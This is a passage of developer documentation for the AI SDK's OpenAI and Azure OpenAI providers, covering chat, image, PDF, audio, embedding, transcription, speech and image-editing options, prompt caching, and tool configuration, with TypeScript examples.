// this can also be a number,
// refer to logprobs provider options section for more
logprobs: true,
} satisfies OpenAILanguageModelChatOptions,
},
});
const openaiMetadata = (await result.providerMetadata)?.openai;
const logprobs = openaiMetadata?.logprobs;
Image Support
The OpenAI Chat API supports image inputs for appropriate models. You can pass image files as part of the message content using the 'image' type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'Please describe the image.',
},
{
type: 'image',
image: readFileSync('./data/image.png'),
},
],
},
],
});
The model will have access to the image and will respond to questions about it.
The image should be passed using the image field.
You can also pass the URL of an image.
{
type: 'image',
image: 'https://sample.edu/image.png',
}
PDF support
The OpenAI Chat API supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
You can also pass a file-id from the OpenAI Files API.
{
type: 'file',
data: 'file-8EFBcWHsQxZV7YGezBC1fq',
mediaType: 'application/pdf',
}
You can also pass the URL of a PDF.
{
type: 'file',
data: 'https://sample.edu/example.pdf',
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
}
Predicted Outputs
OpenAI supports predicted outputs for gpt-4o and gpt-4o-mini.
Predicted outputs help you reduce latency by allowing you to specify a base text that the model should modify.
You can enable predicted outputs by adding the prediction option to the providerOptions.openai object:
const result = streamText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: 'Replace the Username property with an Email property.',
},
{
role: 'user',
content: existingCode,
},
],
providerOptions: {
openai: {
prediction: {
type: 'content',
content: existingCode,
},
} satisfies OpenAILanguageModelChatOptions,
},
});
OpenAI provides usage information for predicted outputs (acceptedPredictionTokens and rejectedPredictionTokens).
You can access it in the providerMetadata object.
const openaiMetadata = (await result.providerMetadata)?.openai;
const acceptedPredictionTokens = openaiMetadata?.acceptedPredictionTokens;
const rejectedPredictionTokens = openaiMetadata?.rejectedPredictionTokens;
Image Detail
You can use the openai provider option to set the image input detail to high, low, or auto:
const result = await generateText({
model: openai.chat('gpt-5'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe the image in detail.' },
{
type: 'image',
image:
'https://github.com/vercel/ai/blob/main/examples/ai-functions/data/comic-cat.png?raw=true',
// OpenAI specific options - image detail:
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
],
});
Distillation
OpenAI supports model distillation for some models.
If you want to store a generation for use in the distillation process, you can add the store option to the providerOptions.openai object.
This will save the generation to the OpenAI platform for later use in distillation.
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
import 'dotenv/config';
async function main() {
const { text, usage } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: 'Who worked on the original macintosh?',
providerOptions: {
openai: {
store: true,
metadata: {
custom: 'value',
},
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(text);
console.log();
console.log('Usage:', usage);
}
main().catch(console.error);
Prompt Caching
OpenAI has introduced Prompt Caching for supported models
including gpt-4o and gpt-4o-mini.
- Prompt caching is automatically enabled for these models when the prompt is 1024 tokens or longer. It does not need to be explicitly enabled.
- You can use the response providerMetadata to access the number of prompt tokens that were a cache hit.
- Note that caching behavior is dependent on load on OpenAI's infrastructure. Prompt prefixes generally remain in the cache following 5-10 minutes of inactivity before they are evicted, but during off-peak periods they may persist for up to an hour.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-4o-mini'),
prompt: `A 1024-token or longer prompt...`,
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
To improve cache hit rates, you can manually control caching using the promptCacheKey option:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
For GPT-5.1 models, you can enable extended prompt caching that keeps cached prefixes active for up to 24 hours:
import { openai, type OpenAILanguageModelChatOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';
const { text, usage, providerMetadata } = await generateText({
model: openai.chat('gpt-5.1'),
prompt: `A 1024-token or longer prompt...`,
providerOptions: {
openai: {
promptCacheKey: 'my-custom-cache-key-123',
promptCacheRetention: '24h', // Extended caching for GPT-5.1
} satisfies OpenAILanguageModelChatOptions,
},
});
console.log(`usage:`, {
...usage,
cachedPromptTokens: providerMetadata?.openai?.cachedPromptTokens,
});
Audio Input
With the gpt-4o-audio-preview model, you can pass audio files to the model.
import { openai } from '@ai-sdk/openai';
import { generateText } from 'ai';
const result = await generateText({
model: openai.chat('gpt-4o-audio-preview'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'What is the audio saying?' },
{
type: 'file',
mediaType: 'audio/mpeg',
data: readFileSync('./data/galileo.mp3'),
},
],
},
],
});
Completion Models
You can create models that call the OpenAI completions API using the .completion() factory method.
The first argument is the model id.
Currently only gpt-3.5-turbo-instruct is supported.
const model = openai.completion('gpt-3.5-turbo-instruct');
OpenAI completion models also support some model-specific provider options that are not part of the standard call settings. You can pass them in the providerOptions argument:
import { openai, type OpenAILanguageModelCompletionOptions } from '@ai-sdk/openai';
import { generateText } from 'ai';

const model = openai.completion('gpt-3.5-turbo-instruct');

await generateText({
  model,
  prompt: 'Write a haiku about the ocean.', // example prompt
  providerOptions: {
    openai: {
      echo: true, // optional, echo the prompt in addition to the completion
      logitBias: {
        // optional likelihood for specific tokens
        '50256': -100,
      },
      suffix: 'some text', // optional suffix that comes after a completion of inserted text
      user: 'test-user', // optional unique user identifier
    } satisfies OpenAILanguageModelCompletionOptions,
  },
});
The following optional provider options are available for OpenAI completion models:
- echo boolean

  Echo back the prompt in addition to the completion.

- logitBias Record<number, number>

  Modifies the likelihood of specified tokens appearing in the completion.

  Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

  As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.

- logprobs boolean | number

  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

  Setting to true will return the log probabilities of the tokens that were generated.

  Setting to a number will return the log probabilities of the top n tokens that were generated.

- suffix string

  The suffix that comes after a completion of inserted text.

- user string

  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Model Capabilities
| Model | Image Input | Audio Input | Object Generation | Tool Usage |
|---|---|---|---|---|
| gpt-5.4-pro | | | | |
| gpt-5.4 | | | | |
| gpt-5.4-mini | | | | |
| gpt-5.4-nano | | | | |
| gpt-5.3-chat-latest | | | | |
| gpt-5.2-pro | | | | |
| gpt-5.2-chat-latest | | | | |
| gpt-5.2 | | | | |
| gpt-5.1-codex-mini | | | | |
| gpt-5.1-codex | | | | |
| gpt-5.1-chat-latest | | | | |
| gpt-5.1 | | | | |
| gpt-5-pro | | | | |
| gpt-5 | | | | |
| gpt-5-mini | | | | |
| gpt-5-nano | | | | |
| gpt-5-codex | | | | |
| gpt-5-chat-latest | | | | |
| gpt-4.1 | | | | |
| gpt-4.1-mini | | | | |
| gpt-4.1-nano | | | | |
| gpt-4o | | | | |
| gpt-4o-mini | | | | |
Embedding Models
You can create models that call the OpenAI embeddings API
using the .embedding() factory method.
const model = openai.embedding('text-embedding-3-large');
OpenAI embedding models support several additional provider options. You can pass them as an options argument:
import { openai, type OpenAIEmbeddingModelOptions } from '@ai-sdk/openai';
import { embed } from 'ai';
const { embedding } = await embed({
model: openai.embedding('text-embedding-3-large'),
value: 'sunny day at the beach',
providerOptions: {
openai: {
dimensions: 512, // optional, number of dimensions for the embedding
user: 'test-user', // optional unique user identifier
} satisfies OpenAIEmbeddingModelOptions,
},
});
The following optional provider options are available for OpenAI embedding models:
-
dimensions: number
The number of dimensions the resulting output embeddings should have. Only supported in text-embedding-3 and later models.
-
user string
A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
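To embed several values in one call, you can use embedMany with the same model (a short sketch):

import { openai } from '@ai-sdk/openai';
import { embedMany } from 'ai';

// Batch-embeds all values; embeddings[i] corresponds to values[i].
const { embeddings } = await embedMany({
  model: openai.embedding('text-embedding-3-small'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
});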
Model Capabilities
| Model | Default Dimensions | Custom Dimensions |
|---|---|---|
| text-embedding-3-large | 3072 | Yes |
| text-embedding-3-small | 1536 | Yes |
| text-embedding-ada-002 | 1536 | No |
Image Models
You can create models that call the OpenAI image generation API
using the .image() factory method.
const model = openai.image('dall-e-3');
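For example, you can generate an image from a text prompt (generateImage is imported as experimental_generateImage; the prompt is illustrative):

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { image } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'A futuristic cityscape at sunset',
  size: '1024x1024',
});

// The generated image is available as base64 or raw bytes:
console.log(image.mediaType, image.base64.length);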
Image Editing
OpenAI's gpt-image-1 model supports powerful image editing capabilities. Pass input images via prompt.images to transform, combine, or edit existing images.
Basic Image Editing
Transform an existing image using text prompts:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'Turn the cat into a dog but retain the style of the original image',
images: [imageBuffer],
},
});
Inpainting with Mask
Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:
const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png'); // Transparent areas = edit regions
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'A sunlit indoor lounge area with a pool containing a flamingo',
images: [image],
mask: mask,
},
});
Background Removal
Remove the background from an image by setting background to transparent:
const imageBuffer = readFileSync('./input-image.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'do not change anything',
images: [imageBuffer],
},
providerOptions: {
openai: {
background: 'transparent',
output_format: 'png',
},
},
});
Multi-Image Combining
Combine multiple reference images into a single output. gpt-image-1 supports up to 16 input images:
const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');
const owl = readFileSync('./owl.png');
const bear = readFileSync('./bear.png');
const { images } = await generateImage({
model: openai.image('gpt-image-1'),
prompt: {
text: 'Combine these animals into a group photo, retaining the original style',
images: [cat, dog, owl, bear],
},
});
Model Capabilities
| Model | Sizes |
|---|---|
| gpt-image-1.5 | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1-mini | 1024x1024, 1536x1024, 1024x1536 |
| gpt-image-1 | 1024x1024, 1536x1024, 1024x1536 |
| dall-e-3 | 1024x1024, 1792x1024, 1024x1792 |
| dall-e-2 | 256x256, 512x512, 1024x1024 |
You can pass optional providerOptions to the image model. These options are model-dependent and subject to change by OpenAI. For example, the gpt-image-1 model supports the quality option:
const { image, providerMetadata } = await generateImage({
model: openai.image('gpt-image-1.5'),
prompt: 'A salamander at sunrise in a forest pond in the Seychelles.',
providerOptions: {
openai: { quality: 'high' },
},
});
For more on generateImage() see Image Generation.
OpenAI's image models return additional metadata in the response that can be
accessed via providerMetadata.openai. The following OpenAI-specific metadata
is available:
- images Array<object>

  Array of image-specific metadata. Each image object may contain:

  - revisedPrompt string - The revised prompt that was actually used to generate the image (OpenAI may modify your prompt for safety or clarity)
  - created number - The Unix timestamp (in seconds) of when the image was created
  - size string - The size of the generated image. One of 1024x1024, 1024x1536, or 1536x1024
  - quality string - The quality of the generated image. One of low, medium, or high
  - background string - The background parameter used for the image generation. Either transparent or opaque
  - outputFormat string - The output format of the generated image. One of png, webp, or jpeg
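For example, you can read the revised prompt of the first generated image like this (a minimal sketch):

import { openai } from '@ai-sdk/openai';
import { experimental_generateImage as generateImage } from 'ai';

const { providerMetadata } = await generateImage({
  model: openai.image('dall-e-3'),
  prompt: 'A cozy cabin in heavy snowfall',
});

// Per-image metadata; revisedPrompt shows the prompt OpenAI actually used.
const meta = providerMetadata?.openai as
  | { images?: Array<{ revisedPrompt?: string }> }
  | undefined;
console.log(meta?.images?.[0]?.revisedPrompt);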
For more information on the available OpenAI image model options, see the OpenAI API reference.
Transcription Models
You can create models that call the OpenAI transcription API
using the .transcription() factory method.
The first argument is the model id e.g. whisper-1.
const model = openai.transcription('whisper-1');
You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the input language in ISO-639-1 (e.g. en) format will improve accuracy and latency.
import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
openai: { language: 'en' } satisfies OpenAITranscriptionModelOptions,
},
});
To get word-level timestamps, specify the granularity:
import { experimental_transcribe as transcribe } from 'ai';
import { openai, type OpenAITranscriptionModelOptions } from '@ai-sdk/openai';
const result = await transcribe({
model: openai.transcription('whisper-1'),
audio: new Uint8Array([1, 2, 3, 4]),
providerOptions: {
openai: {
timestampGranularities: ['word'],
} satisfies OpenAITranscriptionModelOptions,
},
});
// Access word-level timestamps
console.log(result.segments); // Array of segments with startSecond/endSecond
The following provider options are available:
- timestampGranularities string[]

  The granularity of the timestamps in the transcription. Defaults to ['segment']. Possible values are ['word'], ['segment'], and ['word', 'segment']. Note: There is no additional latency for segment timestamps, but generating word timestamps incurs additional latency.

- language string

  The language of the input audio. Supplying the input language in ISO-639-1 format (e.g. 'en') will improve accuracy and latency. Optional.

- prompt string

  An optional text to guide the model's style or continue a previous audio segment. The prompt should match the audio language. Optional.

- temperature number

  The sampling temperature, between 0 and 1. Higher values like 0.8 will make the output more random, while lower values like 0.2 will make it more focused and deterministic. If set to 0, the model will use log probability to automatically increase the temperature until certain thresholds are hit. Defaults to 0. Optional.

- include string[]

  Additional information to include in the transcription response.
Model Capabilities
| Model | Transcription | Duration | Segments | Language |
|---|---|---|---|---|
| whisper-1 | | | | |
| gpt-4o-mini-transcribe | | | | |
| gpt-4o-transcribe | | | | |
Speech Models
You can create models that call the OpenAI speech API
using the .speech() factory method.
The first argument is the model id e.g. tts-1.
const model = openai.speech('tts-1');
The voice argument can be set to one of OpenAI's available voices: alloy, ash, coral, echo, fable, onyx, nova, sage, or shimmer.
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy', // OpenAI voice ID
});
You can also pass additional provider-specific options using the providerOptions argument:
import { experimental_generateSpeech as generateSpeech } from 'ai';
import { openai, type OpenAISpeechModelOptions } from '@ai-sdk/openai';
const result = await generateSpeech({
model: openai.speech('tts-1'),
text: 'Hello, world!',
voice: 'alloy',
providerOptions: {
openai: {
speed: 1.2,
} satisfies OpenAISpeechModelOptions,
},
});
- instructions string

  Control the voice of your generated audio with additional instructions, e.g. "Speak in a slow and steady tone". Does not work with tts-1 or tts-1-hd. Optional.

- speed number

  The speed of the generated audio. Select a value from 0.25 to 4.0. Defaults to 1.0. Optional.
Model Capabilities
| Model | Instructions |
|---|---|
| tts-1 | No |
| tts-1-hd | No |
| gpt-4o-mini-tts | Yes |
---
title: Azure OpenAI
description: Learn how to use the Azure OpenAI provider for the AI SDK.
---
Azure OpenAI Provider
The Azure OpenAI provider contains language model support for the Azure OpenAI chat API.
Setup
The Azure OpenAI provider is available in the @ai-sdk/azure module. You can install it with
pnpm add @ai-sdk/azure
npm install @ai-sdk/azure
yarn add @ai-sdk/azure
bun add @ai-sdk/azure
Provider Instance
You can import the default provider instance azure from @ai-sdk/azure:
import { azure } from '@ai-sdk/azure';
If you need a customized setup, you can import createAzure from @ai-sdk/azure and create a provider instance with your settings:
import { createAzure } from '@ai-sdk/azure';
const azure = createAzure({
resourceName: 'your-resource-name', // Azure resource name
apiKey: 'your-api-key',
});
You can use the following optional settings to customize the Azure OpenAI provider instance:

- resourceName string

  Azure resource name. It defaults to the AZURE_RESOURCE_NAME environment variable.

  The resource name is used in the assembled URL: https://{resourceName}.openai.azure.com/openai/v1{path}. You can use baseURL instead to specify the URL prefix.

- apiKey string

  API key that is being sent using the api-key header. It defaults to the AZURE_API_KEY environment variable.

- apiVersion string

  Sets a custom api version. Defaults to v1.

- baseURL string

  Use a different URL prefix for API calls, e.g. to use proxy servers.

  Either this or resourceName can be used. When a baseURL is provided, the resourceName is ignored. With a baseURL, the resolved URL is {baseURL}/v1{path}.

- headers Record<string,string>

  Custom headers to include in the requests.

- fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

  Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

- useDeploymentBasedUrls boolean

  Use deployment-based URLs for API calls. Set to true to use the legacy deployment format {baseURL}/deployments/{deploymentId}{path}?api-version={apiVersion} instead of {baseURL}/v1{path}?api-version={apiVersion}. Defaults to false. This option is useful for compatibility with certain Azure OpenAI models or deployments that require the legacy endpoint format.
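For instance, a sketch of a legacy deployment-based setup (the apiVersion value is an illustrative placeholder):

import { createAzure } from '@ai-sdk/azure';

const azureLegacy = createAzure({
  resourceName: 'your-resource-name',
  apiKey: 'your-api-key',
  apiVersion: '2024-10-01-preview', // placeholder; use the version your deployment requires
  useDeploymentBasedUrls: true, // {baseURL}/deployments/{deploymentId}{path}?api-version=...
});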
Language Models
The Azure OpenAI provider instance is a function that you can invoke to create a language model:
const model = azure('your-deployment-name');
You need to pass your deployment name as the first argument.
Reasoning Models
Azure exposes the thinking of DeepSeek-R1 in the generated text using the <think> tag.
You can use the extractReasoningMiddleware to extract this reasoning and expose it as a reasoning property on the result:
import { azure } from '@ai-sdk/azure';
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const enhancedModel = wrapLanguageModel({
model: azure('your-deepseek-r1-deployment-name'),
middleware: extractReasoningMiddleware({ tagName: 'think' }),
});
You can then use that enhanced model in functions like generateText and streamText.
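For example (a short sketch), the extracted reasoning is then available alongside the text:

import { generateText } from 'ai';

const { text, reasoning } = await generateText({
  model: enhancedModel,
  prompt: 'How many prime numbers are there below 20?',
});

console.log(reasoning); // the content extracted from the <think> tag
console.log(text); // the remaining answer text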
Example
You can use OpenAI language models to generate text with the generateText function:
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const { text } = await generateText({
model: azure('your-deployment-name'),
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
OpenAI language models can also be used in the streamText function
and support structured data generation with Output
(see AI SDK Core).
Provider Options
When using OpenAI language models on Azure, you can configure provider-specific options using providerOptions.openai. More information on the available configuration options is on the OpenAI provider page.
import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const messages = [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is the capital of the moon?',
},
{
type: 'image',
image: 'https://example.com/image.png',
providerOptions: {
openai: { imageDetail: 'low' },
},
},
],
},
];
const { text } = await generateText({
model: azure('your-deployment-name'),
messages,
providerOptions: {
openai: {
reasoningEffort: 'low',
} satisfies OpenAILanguageModelResponsesOptions,
},
});
Chat Models
You can create models that call the Azure OpenAI chat completions API using the .chat() factory method:
const model = azure.chat('your-deployment-name');
Azure OpenAI chat models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:
import { azure, type OpenAILanguageModelChatOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure.chat('your-deployment-name'),
prompt: 'Write a short story about a robot.',
providerOptions: {
openai: {
logitBias: {
// optional likelihood for specific tokens
'50256': -100,
},
user: 'test-user', // optional unique user identifier
} satisfies OpenAILanguageModelChatOptions,
},
});
The following optional provider options are available for OpenAI chat models:
- logitBias Record<number, number>

  Modifies the likelihood of specified tokens appearing in the completion.

  Accepts a JSON object that maps tokens (specified by their token ID in the GPT tokenizer) to an associated bias value from -100 to 100. You can use this tokenizer tool to convert text to token IDs. Mathematically, the bias is added to the logits generated by the model prior to sampling. The exact effect will vary per model, but values between -1 and 1 should decrease or increase likelihood of selection; values like -100 or 100 should result in a ban or exclusive selection of the relevant token.

  As an example, you can pass {"50256": -100} to prevent the <|endoftext|> token from being generated.

- logprobs boolean | number

  Return the log probabilities of the tokens. Including logprobs will increase the response size and can slow down response times. However, it can be useful to better understand how the model is behaving.

  Setting to true will return the log probabilities of the tokens that were generated.

  Setting to a number will return the log probabilities of the top n tokens that were generated.

- parallelToolCalls boolean

  Whether to enable parallel function calling during tool use. Defaults to true.

- user string

  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Learn more.
Responses Models
Azure OpenAI uses the Responses API by default with the azure(deploymentName) factory method.
const model = azure('your-deployment-name');
Further configuration can be done using OpenAI provider options.
You can validate the provider options using the OpenAILanguageModelResponsesOptions type.
import { azure, type OpenAILanguageModelResponsesOptions } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
providerOptions: {
azure: {
parallelToolCalls: false,
store: false,
user: 'user_123',
// ...
} satisfies OpenAILanguageModelResponsesOptions,
},
// ...
});
The following provider options are available:
- parallelToolCalls boolean

  Whether to use parallel tool calls. Defaults to true.

- store boolean

  Whether to store the generation. Defaults to true.

- metadata Record<string, string>

  Additional metadata to store with the generation.

- previousResponseId string

  The ID of the previous response. You can use it to continue a conversation. Defaults to undefined.

- instructions string

  Instructions for the model. They can be used to change the system or developer message when continuing a conversation using the previousResponseId option. Defaults to undefined.

- user string

  A unique identifier representing your end-user, which can help OpenAI to monitor and detect abuse. Defaults to undefined.

- reasoningEffort 'low' | 'medium' | 'high'

  Reasoning effort for reasoning models. Defaults to medium. If you use providerOptions to set the reasoningEffort option, this model setting will be ignored.

- strictJsonSchema boolean

  Whether to use strict JSON schema validation. Defaults to false.
The Azure OpenAI provider also returns provider-specific metadata:
For Responses models (azure(deploymentName)), you can type this metadata using AzureResponsesProviderMetadata:
import { azure, type AzureResponsesProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
});
const providerMetadata = result.providerMetadata as
| AzureResponsesProviderMetadata
| undefined;
const { responseId, logprobs, serviceTier } = providerMetadata?.azure ?? {};
// responseId can be used to continue a conversation (previousResponseId).
console.log(responseId);
The following Azure-specific metadata may be returned:
- responseId string | null | undefined The ID of the response. Can be used to continue a conversation.
- logprobs (optional) Log probabilities of output tokens (when enabled).
- serviceTier (optional) Service tier information returned by the API.
Web Search Tool
The Azure OpenAI responses API supports web search (preview) through the azure.tools.webSearchPreview tool.
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt: 'What happened in San Francisco last week?',
tools: {
web_search_preview: azure.tools.webSearchPreview({
// optional configuration:
searchContextSize: 'low',
userLocation: {
type: 'approximate',
city: 'San Francisco',
region: 'California',
},
}),
},
// Force web search tool (optional):
toolChoice: { type: 'tool', toolName: 'web_search_preview' },
});
console.log(result.text);
// URL sources directly from `result.sources`
const sources = result.sources;
for (const source of sources) {
console.log('source:', source);
}
File Search Tool
The Azure OpenAI provider supports file search through the azure.tools.fileSearch tool.
You can force the use of the file search tool by setting the toolChoice parameter to { type: 'tool', toolName: 'file_search' }.
const result = await generateText({
model: azure('gpt-5'),
prompt: 'What does the document say about user authentication?',
tools: {
file_search: azure.tools.fileSearch({
// optional configuration:
vectorStoreIds: ['vs_123', 'vs_456'],
maxNumResults: 10,
ranking: {
ranker: 'auto',
},
}),
},
// Force file search tool:
toolChoice: { type: 'tool', toolName: 'file_search' },
});
Image Generation Tool
Azure OpenAI's Responses API supports multi-modal image generation as a provider-defined tool.
Availability is restricted to specific models (for example, gpt-5 variants).
import { createAzure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const azure = createAzure({
headers: {
'x-ms-oai-image-generation-deployment': 'gpt-image-1', // use your own image model deployment
},
});
const result = await generateText({
model: azure('gpt-5'),
prompt:
'Generate an image of an echidna swimming across the Mozambique channel.',
tools: {
image_generation: azure.tools.imageGeneration({ outputFormat: 'png' }),
},
});
for (const toolResult of result.staticToolResults) {
if (toolResult.toolName === 'image_generation') {
const base64Image = toolResult.output.result;
}
}
Code Interpreter Tool
The Azure OpenAI provider supports the code interpreter tool through the azure.tools.codeInterpreter tool. This allows models to write and execute Python code.
import { azure } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-5'),
prompt: 'Write and run Python code to calculate the factorial of 10',
tools: {
code_interpreter: azure.tools.codeInterpreter({
// optional configuration:
container: {
fileIds: ['assistant-123', 'assistant-456'], // optional file IDs to make available
},
}),
},
});
The code interpreter tool can be configured with:
- container: Either a container ID string or an object with fileIds to specify uploaded files that should be available to the code interpreter
PDF support
The Azure OpenAI provider supports reading PDF files.
You can pass PDF files as part of the message content using the file type:
const result = await generateText({
model: azure('your-deployment-name'),
messages: [
{
role: 'user',
content: [
{
type: 'text',
text: 'What is an embedding model?',
},
{
type: 'file',
data: fs.readFileSync('./data/ai.pdf'),
mediaType: 'application/pdf',
filename: 'ai.pdf', // optional
},
],
},
],
});
The model will have access to the contents of the PDF file and
respond to questions about it.
The PDF file should be passed using the data field,
and the mediaType should be set to 'application/pdf'.
Typed providerMetadata in Text Parts
When using the Azure OpenAI Responses API, the SDK attaches Azure OpenAI-specific metadata to output parts via providerMetadata.
This metadata can be used on the client side for tasks such as rendering citations or downloading files generated by the Code Interpreter. To enable type-safe handling of this metadata, the AI SDK exports dedicated TypeScript types.
For text parts, when part.type === 'text', the providerMetadata is provided in the form of AzureResponsesTextProviderMetadata.
This metadata includes the following fields:
- itemId

  The ID of the output item in the Responses API.

- annotations (optional)

  An array of annotation objects generated by the model. If no annotations are present, this property itself may be omitted (undefined).

  Each element in annotations is a discriminated union with a required type field. Supported types include, for example:

  - url_citation
  - file_citation
  - container_file_citation
  - file_path
These annotations directly correspond to the annotation objects defined by the Responses API and can be used for inline reference rendering or output analysis. For details, see the official OpenAI documentation: Responses API – output text annotations.
import { azure, type AzureResponsesTextProviderMetadata } from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: azure.tools.codeInterpreter(),
web_search_preview: azure.tools.webSearchPreview({}),
file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
},
});
for (const part of result.content) {
if (part.type === 'text') {
const providerMetadata = part.providerMetadata as
| AzureResponsesTextProviderMetadata
| undefined;
if (!providerMetadata) continue;
const { itemId: _itemId, annotations } = providerMetadata.azure;
if (!annotations) continue;
for (const annotation of annotations) {
switch (annotation.type) {
case 'url_citation':
// url_citation is returned from web_search and provides:
// properties: type, url, title, start_index and end_index
break;
case 'file_citation':
// file_citation is returned from file_search and provides:
// properties: type, file_id, filename and index
break;
case 'container_file_citation':
// container_file_citation is returned from code_interpreter and provides:
// properties: type, container_id, file_id, filename, start_index and end_index
break;
case 'file_path':
// file_path provides:
// properties: type, file_id and index
break;
default: {
const _exhaustiveCheck: never = annotation;
throw new Error(
`Unhandled annotation: ${JSON.stringify(_exhaustiveCheck)}`,
);
}
}
}
}
}
Typed providerMetadata in Reasoning Parts
When using the Azure OpenAI Responses API, reasoning output parts can include provider metadata.
To handle this metadata in a type-safe way, use AzureResponsesReasoningProviderMetadata.
For reasoning parts, when part.type === 'reasoning', the providerMetadata is provided in the form of AzureResponsesReasoningProviderMetadata.
This metadata includes the following fields:
- itemId
  The ID of the reasoning item in the Responses API.
- reasoningEncryptedContent (optional)
  Encrypted reasoning content (only returned when requested via include: ['reasoning.encrypted_content']).
import {
azure,
type AzureResponsesReasoningProviderMetadata,
type OpenAILanguageModelResponsesOptions,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('your-deployment-name'),
prompt: 'How many "r"s are in the word "strawberry"?',
providerOptions: {
azure: {
store: false,
include: ['reasoning.encrypted_content'],
} satisfies OpenAILanguageModelResponsesOptions,
},
});
for (const part of result.content) {
if (part.type === 'reasoning') {
const providerMetadata = part.providerMetadata as
| AzureResponsesReasoningProviderMetadata
| undefined;
const { itemId, reasoningEncryptedContent } = providerMetadata?.azure ?? {};
console.log(itemId, reasoningEncryptedContent);
}
}
Typed providerMetadata in Source Document Parts
For source document parts, when part.type === 'source' and sourceType === 'document', the providerMetadata is provided as AzureResponsesSourceDocumentProviderMetadata.
This metadata is also a discriminated union with a required type field. Supported types include:
file_citation, container_file_citation, and file_path
Each type includes the identifiers required to work with the referenced resource, such as fileId and containerId.
import {
azure,
type AzureResponsesSourceDocumentProviderMetadata,
} from '@ai-sdk/azure';
import { generateText } from 'ai';
const result = await generateText({
model: azure('gpt-4.1-mini'),
prompt:
'Create a program that generates five random numbers between 1 and 100 with two decimal places, and show me the execution results. Also save the result to a file.',
tools: {
code_interpreter: azure.tools.codeInterpreter(),
web_search_preview: azure.tools.webSearchPreview({}),
file_search: azure.tools.fileSearch({ vectorStoreIds: ['vs_1234'] }), // requires a configured vector store
